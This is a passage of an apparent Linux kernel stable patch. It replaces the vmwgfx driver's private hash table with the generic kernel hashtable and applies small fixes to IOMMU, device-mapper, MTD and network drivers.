+ 	sw_context->ctx = &val_ctx;
+ 	ret = vmw_execbuf_tie_context(dev_priv, sw_context, dx_context_handle);
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.c b/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.c
+deleted file mode 100644
+index 06aebc12774e7..0000000000000
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.c
++++ /dev/null
+@@ -1,199 +0,0 @@
+-/*
+- * Copyright 2006 Tungsten Graphics, Inc., Bismarck, ND. USA.
+- * All Rights Reserved.
+- *
+- * Permission is hereby granted, free of charge, to any person obtaining a
+- * copy of this software and associated documentation files (the
+- * "Software"), to deal in the Software without restriction, including
+- * without limitation the rights to use, copy, modify, merge, publish,
+- * distribute, sub license, and/or sell copies of the Software, and to
+- * permit persons to whom the Software is furnished to do so, subject to
+- * the following conditions:
+- *
+- * The above copyright notice and this permission notice (including the
+- * next paragraph) shall be included in all copies or substantial portions
+- * of the Software.
+- *
+- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+- * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
+- * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM,
+- * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
+- * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
+- * USE OR OTHER DEALINGS IN THE SOFTWARE.
+- */
+-
+-/*
+- * Simple open hash tab implementation.
+- *
+- * Authors:
+- * Thomas Hellström <thomas-at-tungstengraphics-dot-com>
+- */
+-
+-#include <linux/export.h>
+-#include <linux/hash.h>
+-#include <linux/mm.h>
+-#include <linux/rculist.h>
+-#include <linux/slab.h>
+-#include <linux/vmalloc.h>
+-
+-#include <drm/drm_print.h>
+-
+-#include "vmwgfx_hashtab.h"
+-
+-int vmwgfx_ht_create(struct vmwgfx_open_hash *ht, unsigned int order)
+-{
+-	unsigned int size = 1 << order;
+-
+-	ht->order = order;
+-	ht->table = NULL;
+-	if (size <= PAGE_SIZE / sizeof(*ht->table))
+-		ht->table = kcalloc(size, sizeof(*ht->table), GFP_KERNEL);
+-	else
+-		ht->table = vzalloc(array_size(size, sizeof(*ht->table)));
+-	if (!ht->table) {
+-		DRM_ERROR("Out of memory for hash table\n");
+-		return -ENOMEM;
+-	}
+-	return 0;
+-}
+-
+-void vmwgfx_ht_verbose_list(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	unsigned int hashed_key;
+-	int count = 0;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	DRM_DEBUG("Key is 0x%08lx, Hashed key is 0x%08x\n", key, hashed_key);
+-	h_list = &ht->table[hashed_key];
+-	hlist_for_each_entry(entry, h_list, head)
+-		DRM_DEBUG("count %d, key: 0x%08lx\n", count++, entry->key);
+-}
+-
+-static struct hlist_node *vmwgfx_ht_find_key(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	unsigned int hashed_key;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	h_list = &ht->table[hashed_key];
+-	hlist_for_each_entry(entry, h_list, head) {
+-		if (entry->key == key)
+-			return &entry->head;
+-		if (entry->key > key)
+-			break;
+-	}
+-	return NULL;
+-}
+-
+-static struct hlist_node *vmwgfx_ht_find_key_rcu(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	unsigned int hashed_key;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	h_list = &ht->table[hashed_key];
+-	hlist_for_each_entry_rcu(entry, h_list, head) {
+-		if (entry->key == key)
+-			return &entry->head;
+-		if (entry->key > key)
+-			break;
+-	}
+-	return NULL;
+-}
+-
+-int vmwgfx_ht_insert_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item)
+-{
+-	struct vmwgfx_hash_item *entry;
+-	struct hlist_head *h_list;
+-	struct hlist_node *parent;
+-	unsigned int hashed_key;
+-	unsigned long key = item->key;
+-
+-	hashed_key = hash_long(key, ht->order);
+-	h_list = &ht->table[hashed_key];
+-	parent = NULL;
+-	hlist_for_each_entry(entry, h_list, head) {
+-		if (entry->key == key)
+-			return -EINVAL;
+-		if (entry->key > key)
+-			break;
+-		parent = &entry->head;
+-	}
+-	if (parent)
+-		hlist_add_behind_rcu(&item->head, parent);
+-	else
+-		hlist_add_head_rcu(&item->head, h_list);
+-	return 0;
+-}
+-
+-/*
+- * Just insert an item and return any "bits" bit key that hasn't been
+- * used before.
+- */
+-int vmwgfx_ht_just_insert_please(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item,
+-				 unsigned long seed, int bits, int shift,
+-				 unsigned long add)
+-{
+-	int ret;
+-	unsigned long mask = (1UL << bits) - 1;
+-	unsigned long first, unshifted_key;
+-
+-	unshifted_key = hash_long(seed, bits);
+-	first = unshifted_key;
+-	do {
+-		item->key = (unshifted_key << shift) + add;
+-		ret = vmwgfx_ht_insert_item(ht, item);
+-		if (ret)
+-			unshifted_key = (unshifted_key + 1) & mask;
+-	} while (ret && (unshifted_key != first));
+-
+-	if (ret) {
+-		DRM_ERROR("Available key bit space exhausted\n");
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-int vmwgfx_ht_find_item(struct vmwgfx_open_hash *ht, unsigned long key,
+-			struct vmwgfx_hash_item **item)
+-{
+-	struct hlist_node *list;
+-
+-	list = vmwgfx_ht_find_key_rcu(ht, key);
+-	if (!list)
+-		return -EINVAL;
+-
+-	*item = hlist_entry(list, struct vmwgfx_hash_item, head);
+-	return 0;
+-}
+-
+-int vmwgfx_ht_remove_key(struct vmwgfx_open_hash *ht, unsigned long key)
+-{
+-	struct hlist_node *list;
+-
+-	list = vmwgfx_ht_find_key(ht, key);
+-	if (list) {
+-		hlist_del_init_rcu(list);
+-		return 0;
+-	}
+-	return -EINVAL;
+-}
+-
+-int vmwgfx_ht_remove_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item)
+-{
+-	hlist_del_init_rcu(&item->head);
+-	return 0;
+-}
+-
+-void vmwgfx_ht_remove(struct vmwgfx_open_hash *ht)
+-{
+-	if (ht->table) {
+-		kvfree(ht->table);
+-		ht->table = NULL;
+-	}
+-}
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.h b/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.h
+deleted file mode 100644
+index a9ce12922e21c..0000000000000
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_hashtab.h
++++ /dev/null
+@@ -1,83 +0,0 @@
+-/*
+- * Copyright 2006 Tungsten Graphics, Inc., Bismack, ND. USA.
+- * All Rights Reserved.
+- *
+- * Permission is hereby granted, free of charge, to any person obtaining a
+- * copy of this software and associated documentation files (the
+- * "Software"), to deal in the Software without restriction, including
+- * without limitation the rights to use, copy, modify, merge, publish,
+- * distribute, sub license, and/or sell copies of the Software, and to
+- * permit persons to whom the Software is furnished to do so, subject to
+- * the following conditions:
+- *
+- * The above copyright notice and this permission notice (including the
+- * next paragraph) shall be included in all copies or substantial portions
+- * of the Software.
+- *
+- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+- * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
+- * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM,
+- * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
+- * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
+- * USE OR OTHER DEALINGS IN THE SOFTWARE.
+- */
+-
+-/*
+- * Simple open hash tab implementation.
+- *
+- * Authors:
+- * Thomas Hellström <thomas-at-tungstengraphics-dot-com>
+- */
+-
+-/*
+- * TODO: Replace this hashtable with Linux' generic implementation
+- *       from <linux/hashtable.h>.
+- */
+-
+-#ifndef VMWGFX_HASHTAB_H
+-#define VMWGFX_HASHTAB_H
+-
+-#include <linux/list.h>
+-
+-#define drm_hash_entry(_ptr, _type, _member) container_of(_ptr, _type, _member)
+-
+-struct vmwgfx_hash_item {
+-	struct hlist_node head;
+-	unsigned long key;
+-};
+-
+-struct vmwgfx_open_hash {
+-	struct hlist_head *table;
+-	u8 order;
+-};
+-
+-int vmwgfx_ht_create(struct vmwgfx_open_hash *ht, unsigned int order);
+-int vmwgfx_ht_insert_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item);
+-int vmwgfx_ht_just_insert_please(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item,
+-				 unsigned long seed, int bits, int shift,
+-				 unsigned long add);
+-int vmwgfx_ht_find_item(struct vmwgfx_open_hash *ht, unsigned long key,
+-			struct vmwgfx_hash_item **item);
+-
+-void vmwgfx_ht_verbose_list(struct vmwgfx_open_hash *ht, unsigned long key);
+-int vmwgfx_ht_remove_key(struct vmwgfx_open_hash *ht, unsigned long key);
+-int vmwgfx_ht_remove_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item);
+-void vmwgfx_ht_remove(struct vmwgfx_open_hash *ht);
+-
+-/*
+- * RCU-safe interface
+- *
+- * The user of this API needs to make sure that two or more instances of the
+- * hash table manipulation functions are never run simultaneously.
+- * The lookup function vmwgfx_ht_find_item_rcu may, however, run simultaneously
+- * with any of the manipulation functions as long as it's called from within
+- * an RCU read-locked section.
+- */
+-#define vmwgfx_ht_insert_item_rcu vmwgfx_ht_insert_item
+-#define vmwgfx_ht_just_insert_please_rcu vmwgfx_ht_just_insert_please
+-#define vmwgfx_ht_remove_key_rcu vmwgfx_ht_remove_key
+-#define vmwgfx_ht_remove_item_rcu vmwgfx_ht_remove_item
+-#define vmwgfx_ht_find_item_rcu vmwgfx_ht_find_item
+-
+-#endif
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+index f66caa540e146..c7d645e5ec7bf 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+@@ -281,39 +281,6 @@ out_bad_resource:
+ 	return ret;
+ }
+ 
+-/**
+- * vmw_user_resource_noref_lookup_handle - lookup a struct resource from a
+- * TTM user-space handle and perform basic type checks
+- *
+- * @dev_priv:     Pointer to a device private struct
+- * @tfile:        Pointer to a struct ttm_object_file identifying the caller
+- * @handle:       The TTM user-space handle
+- * @converter:    Pointer to an object describing the resource type
+- *
+- * If the handle can't be found or is associated with an incorrect resource
+- * type, -EINVAL will be returned.
+- */
+-struct vmw_resource *
+-vmw_user_resource_noref_lookup_handle(struct vmw_private *dev_priv,
+-				      struct ttm_object_file *tfile,
+-				      uint32_t handle,
+-				      const struct vmw_user_resource_conv
+-				      *converter)
+-{
+-	struct ttm_base_object *base;
+-
+-	base = ttm_base_object_noref_lookup(tfile, handle);
+-	if (!base)
+-		return ERR_PTR(-ESRCH);
+-
+-	if (unlikely(ttm_base_object_type(base) != converter->object_type)) {
+-		ttm_base_object_noref_release();
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	return converter->base_obj_to_res(base);
+-}
+-
+ /*
+  * Helper function that looks either a surface or bo.
+  *
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c
+index f46891012be30..f5c4a40fb16d7 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0 OR MIT
+ /**************************************************************************
+  *
+- * Copyright © 2018 VMware, Inc., Palo Alto, CA., USA
++ * Copyright © 2018 - 2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -180,11 +180,16 @@ vmw_validation_find_bo_dup(struct vmw_validation_context *ctx,
+ 	if (!ctx->merge_dups)
+ 		return NULL;
+ 
+-	if (ctx->ht) {
++	if (ctx->sw_context) {
+ 		struct vmwgfx_hash_item *hash;
++		unsigned long key = (unsigned long) vbo;
+ 
+-		if (!vmwgfx_ht_find_item(ctx->ht, (unsigned long) vbo, &hash))
+-			bo_node = container_of(hash, typeof(*bo_node), hash);
++		hash_for_each_possible_rcu(ctx->sw_context->res_ht, hash, head, key) {
++			if (hash->key == key) {
++				bo_node = container_of(hash, typeof(*bo_node), hash);
++				break;
++			}
++		}
+ 	} else {
+ 		struct  vmw_validation_bo_node *entry;
+ 
+@@ -217,11 +222,16 @@ vmw_validation_find_res_dup(struct vmw_validation_context *ctx,
+ 	if (!ctx->merge_dups)
+ 		return NULL;
+ 
+-	if (ctx->ht) {
++	if (ctx->sw_context) {
+ 		struct vmwgfx_hash_item *hash;
++		unsigned long key = (unsigned long) res;
+ 
+-		if (!vmwgfx_ht_find_item(ctx->ht, (unsigned long) res, &hash))
+-			res_node = container_of(hash, typeof(*res_node), hash);
++		hash_for_each_possible_rcu(ctx->sw_context->res_ht, hash, head, key) {
++			if (hash->key == key) {
++				res_node = container_of(hash, typeof(*res_node), hash);
++				break;
++			}
++		}
+ 	} else {
+ 		struct  vmw_validation_res_node *entry;
+ 
+@@ -269,20 +279,15 @@ int vmw_validation_add_bo(struct vmw_validation_context *ctx,
+ 		}
+ 	} else {
+ 		struct ttm_validate_buffer *val_buf;
+-		int ret;
+ 
+ 		bo_node = vmw_validation_mem_alloc(ctx, sizeof(*bo_node));
+ 		if (!bo_node)
+ 			return -ENOMEM;
+ 
+-		if (ctx->ht) {
++		if (ctx->sw_context) {
+ 			bo_node->hash.key = (unsigned long) vbo;
+-			ret = vmwgfx_ht_insert_item(ctx->ht, &bo_node->hash);
+-			if (ret) {
+-				DRM_ERROR("Failed to initialize a buffer "
+-					  "validation entry.\n");
+-				return ret;
+-			}
++			hash_add_rcu(ctx->sw_context->res_ht, &bo_node->hash.head,
++				bo_node->hash.key);
+ 		}
+ 		val_buf = &bo_node->base;
+ 		val_buf->bo = ttm_bo_get_unless_zero(&vbo->base);
+@@ -316,7 +321,6 @@ int vmw_validation_add_resource(struct vmw_validation_context *ctx,
+ 				bool *first_usage)
+ {
+ 	struct vmw_validation_res_node *node;
+-	int ret;
+ 
+ 	node = vmw_validation_find_res_dup(ctx, res);
+ 	if (node) {
+@@ -330,14 +334,9 @@ int vmw_validation_add_resource(struct vmw_validation_context *ctx,
+ 		return -ENOMEM;
+ 	}
+ 
+-	if (ctx->ht) {
++	if (ctx->sw_context) {
+ 		node->hash.key = (unsigned long) res;
+-		ret = vmwgfx_ht_insert_item(ctx->ht, &node->hash);
+-		if (ret) {
+-			DRM_ERROR("Failed to initialize a resource validation "
+-				  "entry.\n");
+-			return ret;
+-		}
++		hash_add_rcu(ctx->sw_context->res_ht, &node->hash.head, node->hash.key);
+ 	}
+ 	node->res = vmw_resource_reference_unless_doomed(res);
+ 	if (!node->res)
+@@ -681,19 +680,19 @@ void vmw_validation_drop_ht(struct vmw_validation_context *ctx)
+ 	struct vmw_validation_bo_node *entry;
+ 	struct vmw_validation_res_node *val;
+ 
+-	if (!ctx->ht)
++	if (!ctx->sw_context)
+ 		return;
+ 
+ 	list_for_each_entry(entry, &ctx->bo_list, base.head)
+-		(void) vmwgfx_ht_remove_item(ctx->ht, &entry->hash);
++		hash_del_rcu(&entry->hash.head);
+ 
+ 	list_for_each_entry(val, &ctx->resource_list, head)
+-		(void) vmwgfx_ht_remove_item(ctx->ht, &val->hash);
++		hash_del_rcu(&val->hash.head);
+ 
+ 	list_for_each_entry(val, &ctx->resource_ctx_list, head)
+-		(void) vmwgfx_ht_remove_item(ctx->ht, &val->hash);
++		hash_del_rcu(&entry->hash.head);
+ 
+-	ctx->ht = NULL;
++	ctx->sw_context = NULL;
+ }
+ 
+ /**
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h
+index f21df053882ba..ab9ec226f433a 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h
+@@ -1,7 +1,7 @@
+ /* SPDX-License-Identifier: GPL-2.0 OR MIT */
+ /**************************************************************************
+  *
+- * Copyright © 2018 VMware, Inc., Palo Alto, CA., USA
++ * Copyright © 2018 - 2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -29,12 +29,11 @@
+ #define _VMWGFX_VALIDATION_H_
+ 
+ #include <linux/list.h>
++#include <linux/hashtable.h>
+ #include <linux/ww_mutex.h>
+ 
+ #include <drm/ttm/ttm_execbuf_util.h>
+ 
+-#include "vmwgfx_hashtab.h"
+-
+ #define VMW_RES_DIRTY_NONE 0
+ #define VMW_RES_DIRTY_SET BIT(0)
+ #define VMW_RES_DIRTY_CLEAR BIT(1)
+@@ -59,7 +58,7 @@
+  * @total_mem: Amount of reserved memory.
+  */
+ struct vmw_validation_context {
+-	struct vmwgfx_open_hash *ht;
++	struct vmw_sw_context *sw_context;
+ 	struct list_head resource_list;
+ 	struct list_head resource_ctx_list;
+ 	struct list_head bo_list;
+@@ -82,16 +81,16 @@ struct vmw_fence_obj;
+ /**
+  * DECLARE_VAL_CONTEXT - Declare a validation context with initialization
+  * @_name: The name of the variable
+- * @_ht: The hash table used to find dups or NULL if none
++ * @_sw_context: Contains the hash table used to find dups or NULL if none
+  * @_merge_dups: Whether to merge duplicate buffer object- or resource
+  * entries. If set to true, ideally a hash table pointer should be supplied
+  * as well unless the number of resources and buffer objects per validation
+  * is known to be very small
+  */
+ #endif
+-#define DECLARE_VAL_CONTEXT(_name, _ht, _merge_dups)			\
++#define DECLARE_VAL_CONTEXT(_name, _sw_context, _merge_dups)		\
+ 	struct vmw_validation_context _name =				\
+-	{ .ht = _ht,							\
++	{ .sw_context = _sw_context,					\
+ 	  .resource_list = LIST_HEAD_INIT((_name).resource_list),	\
+ 	  .resource_ctx_list = LIST_HEAD_INIT((_name).resource_ctx_list), \
+ 	  .bo_list = LIST_HEAD_INIT((_name).bo_list),			\
+@@ -114,19 +113,6 @@ vmw_validation_has_bos(struct vmw_validation_context *ctx)
+ 	return !list_empty(&ctx->bo_list);
+ }
+ 
+-/**
+- * vmw_validation_set_ht - Register a hash table for duplicate finding
+- * @ctx: The validation context
+- * @ht: Pointer to a hash table to use for duplicate finding
+- * This function is intended to be used if the hash table wasn't
+- * available at validation context declaration time
+- */
+-static inline void vmw_validation_set_ht(struct vmw_validation_context *ctx,
+-					 struct vmwgfx_open_hash *ht)
+-{
+-	ctx->ht = ht;
+-}
+-
+ /**
+  * vmw_validation_bo_reserve - Reserve buffer objects registered with a
+  * validation context
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index 6d5df91c5c465..d4d8bfee9febc 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -3854,7 +3854,9 @@ static int arm_smmu_device_remove(struct platform_device *pdev)
+ 
+ static void arm_smmu_device_shutdown(struct platform_device *pdev)
+ {
+-	arm_smmu_device_remove(pdev);
++	struct arm_smmu_device *smmu = platform_get_drvdata(pdev);
++
++	arm_smmu_device_disable(smmu);
+ }
+ 
+ static const struct of_device_id arm_smmu_of_match[] = {
+diff --git a/drivers/iommu/arm/arm-smmu/arm-smmu.c b/drivers/iommu/arm/arm-smmu/arm-smmu.c
+index 30dab1418e3ff..f38b54a887678 100644
+--- a/drivers/iommu/arm/arm-smmu/arm-smmu.c
++++ b/drivers/iommu/arm/arm-smmu/arm-smmu.c
+@@ -1319,8 +1319,14 @@ static bool arm_smmu_capable(struct device *dev, enum iommu_cap cap)
+ 
+ 	switch (cap) {
+ 	case IOMMU_CAP_CACHE_COHERENCY:
+-		/* Assume that a coherent TCU implies coherent TBUs */
+-		return cfg->smmu->features & ARM_SMMU_FEAT_COHERENT_WALK;
++		/*
++		 * It's overwhelmingly the case in practice that when the pagetable
++		 * walk interface is connected to a coherent interconnect, all the
++		 * translation interfaces are too. Furthermore if the device is
++		 * natively coherent, then its translation interface must also be.
++		 */
++		return cfg->smmu->features & ARM_SMMU_FEAT_COHERENT_WALK ||
++			device_get_dma_attr(dev) == DEV_DMA_COHERENT;
+ 	case IOMMU_CAP_NOEXEC:
+ 		return true;
+ 	default:
+@@ -2188,19 +2194,16 @@ static int arm_smmu_device_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int arm_smmu_device_remove(struct platform_device *pdev)
++static void arm_smmu_device_shutdown(struct platform_device *pdev)
+ {
+ 	struct arm_smmu_device *smmu = platform_get_drvdata(pdev);
+ 
+ 	if (!smmu)
+-		return -ENODEV;
++		return;
+ 
+ 	if (!bitmap_empty(smmu->context_map, ARM_SMMU_MAX_CBS))
+ 		dev_notice(&pdev->dev, "disabling translation\n");
+ 
+-	iommu_device_unregister(&smmu->iommu);
+-	iommu_device_sysfs_remove(&smmu->iommu);
+-
+ 	arm_smmu_rpm_get(smmu);
+ 	/* Turn the thing off */
+ 	arm_smmu_gr0_write(smmu, ARM_SMMU_GR0_sCR0, ARM_SMMU_sCR0_CLIENTPD);
+@@ -2212,12 +2215,21 @@ static int arm_smmu_device_remove(struct platform_device *pdev)
+ 		clk_bulk_disable(smmu->num_clks, smmu->clks);
+ 
+ 	clk_bulk_unprepare(smmu->num_clks, smmu->clks);
+-	return 0;
+ }
+ 
+-static void arm_smmu_device_shutdown(struct platform_device *pdev)
++static int arm_smmu_device_remove(struct platform_device *pdev)
+ {
+-	arm_smmu_device_remove(pdev);
++	struct arm_smmu_device *smmu = platform_get_drvdata(pdev);
++
++	if (!smmu)
++		return -ENODEV;
++
++	iommu_device_unregister(&smmu->iommu);
++	iommu_device_sysfs_remove(&smmu->iommu);
++
++	arm_smmu_device_shutdown(pdev);
++
++	return 0;
+ }
+ 
+ static int __maybe_unused arm_smmu_runtime_resume(struct device *dev)
+diff --git a/drivers/iommu/iova.c b/drivers/iommu/iova.c
+index a44ad92fc5eb7..fe452ce466429 100644
+--- a/drivers/iommu/iova.c
++++ b/drivers/iommu/iova.c
+@@ -197,7 +197,7 @@ static int __alloc_and_insert_iova_range(struct iova_domain *iovad,
+ 
+ 	curr = __get_cached_rbnode(iovad, limit_pfn);
+ 	curr_iova = to_iova(curr);
+-	retry_pfn = curr_iova->pfn_hi + 1;
++	retry_pfn = curr_iova->pfn_hi;
+ 
+ retry:
+ 	do {
+@@ -211,7 +211,7 @@ retry:
+ 	if (high_pfn < size || new_pfn < low_pfn) {
+ 		if (low_pfn == iovad->start_pfn && retry_pfn < limit_pfn) {
+ 			high_pfn = limit_pfn;
+-			low_pfn = retry_pfn;
++			low_pfn = retry_pfn + 1;
+ 			curr = iova_find_limit(iovad, limit_pfn);
+ 			curr_iova = to_iova(curr);
+ 			goto retry;
+diff --git a/drivers/iommu/mtk_iommu_v1.c b/drivers/iommu/mtk_iommu_v1.c
+index 6e0e65831eb70..a978220eb620e 100644
+--- a/drivers/iommu/mtk_iommu_v1.c
++++ b/drivers/iommu/mtk_iommu_v1.c
+@@ -685,7 +685,7 @@ static int mtk_iommu_v1_probe(struct platform_device *pdev)
+ 	ret = iommu_device_sysfs_add(&data->iommu, &pdev->dev, NULL,
+ 				     dev_name(&pdev->dev));
+ 	if (ret)
+-		return ret;
++		goto out_clk_unprepare;
+ 
+ 	ret = iommu_device_register(&data->iommu, &mtk_iommu_v1_ops, dev);
+ 	if (ret)
+@@ -700,6 +700,8 @@ out_dev_unreg:
+ 	iommu_device_unregister(&data->iommu);
+ out_sysfs_remove:
+ 	iommu_device_sysfs_remove(&data->iommu);
++out_clk_unprepare:
++	clk_disable_unprepare(data->bclk);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index e30c2d2bc9c78..d49809e9db96e 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -1755,6 +1755,8 @@ static void dm_split_and_process_bio(struct mapped_device *md,
+ 		 * otherwise associated queue_limits won't be imposed.
+ 		 */
+ 		bio = bio_split_to_limits(bio);
++		if (!bio)
++			return;
+ 	}
+ 
+ 	init_clone_info(&ci, md, map, bio, is_abnormal);
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index fd82881761d34..b911085060dc3 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -443,6 +443,8 @@ static void md_submit_bio(struct bio *bio)
+ 	}
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	if (mddev->ro == 1 && unlikely(rw == WRITE)) {
+ 		if (bio_sectors(bio) != 0)
+diff --git a/drivers/mtd/parsers/scpart.c b/drivers/mtd/parsers/scpart.c
+index 02601bb33de4e..6e5e11c37078f 100644
+--- a/drivers/mtd/parsers/scpart.c
++++ b/drivers/mtd/parsers/scpart.c
+@@ -50,7 +50,7 @@ static int scpart_scan_partmap(struct mtd_info *master, loff_t partmap_offs,
+ 	int cnt = 0;
+ 	int res = 0;
+ 	int res2;
+-	loff_t offs;
++	uint32_t offs;
+ 	size_t retlen;
+ 	struct sc_part_desc *pdesc = NULL;
+ 	struct sc_part_desc *tmpdesc;
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 2e0655c0b606f..5dbf52aa03551 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -10,6 +10,7 @@
+ #include <linux/err.h>
+ #include <linux/errno.h>
+ #include <linux/module.h>
++#include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/mutex.h>
+ #include <linux/math64.h>
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index f5a8bae8d79a1..edca16b5f9e34 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -990,7 +990,7 @@ static struct sk_buff *bnxt_rx_multi_page_skb(struct bnxt *bp,
+ 			     DMA_ATTR_WEAK_ORDERING);
+ 	skb = build_skb(page_address(page), PAGE_SIZE);
+ 	if (!skb) {
+-		__free_page(page);
++		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+ 	}
+ 	skb_mark_for_recycle(skb);
+@@ -1028,7 +1028,7 @@ static struct sk_buff *bnxt_rx_page_skb(struct bnxt *bp,
+ 
+ 	skb = napi_alloc_skb(&rxr->bnapi->napi, payload);
+ 	if (!skb) {
+-		__free_page(page);
++		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 081bd2c3f2891..e84e5be8e59ed 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -3130,7 +3130,7 @@ static int hclgevf_set_channels(struct hnae3_handle *handle, u32 new_tqps_num,
+ 
+ 	hclgevf_update_rss_size(handle, new_tqps_num);
+ 
+-	hclge_comm_get_rss_tc_info(cur_rss_size, hdev->hw_tc_map,
++	hclge_comm_get_rss_tc_info(kinfo->rss_size, hdev->hw_tc_map,
+ 				   tc_offset, tc_valid, tc_size);
+ 	ret = hclge_comm_set_rss_tc_mode(&hdev->hw.hw, tc_offset,
+ 					 tc_valid, tc_size);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index f71e132ede094..260c55951c287 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -3850,7 +3850,7 @@ static int iavf_parse_cls_flower(struct iavf_adapter *adapter,
+ 				field_flags |= IAVF_CLOUD_FIELD_IIP;
+ 			} else {
+ 				dev_err(&adapter->pdev->dev, "Bad ip src mask 0x%08x\n",
+-					be32_to_cpu(match.mask->dst));
++					be32_to_cpu(match.mask->src));
+ 				return -EINVAL;
+ 			}
+ 		}
+diff --git a/drivers/net/ethernet/intel/ice/ice_gnss.c b/drivers/net/ethernet/intel/ice/ice_gnss.c
+index b5a7f246d230f..43e199b5b513b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_gnss.c
++++ b/drivers/net/ethernet/intel/ice/ice_gnss.c
+@@ -363,6 +363,7 @@ ice_gnss_tty_write(struct tty_struct *tty, const unsigned char *buf, int count)
+ 	/* Send the data out to a hardware port */
+ 	write_buf = kzalloc(sizeof(*write_buf), GFP_KERNEL);
+ 	if (!write_buf) {
++		kfree(cmd_buf);
+ 		err = -ENOMEM;
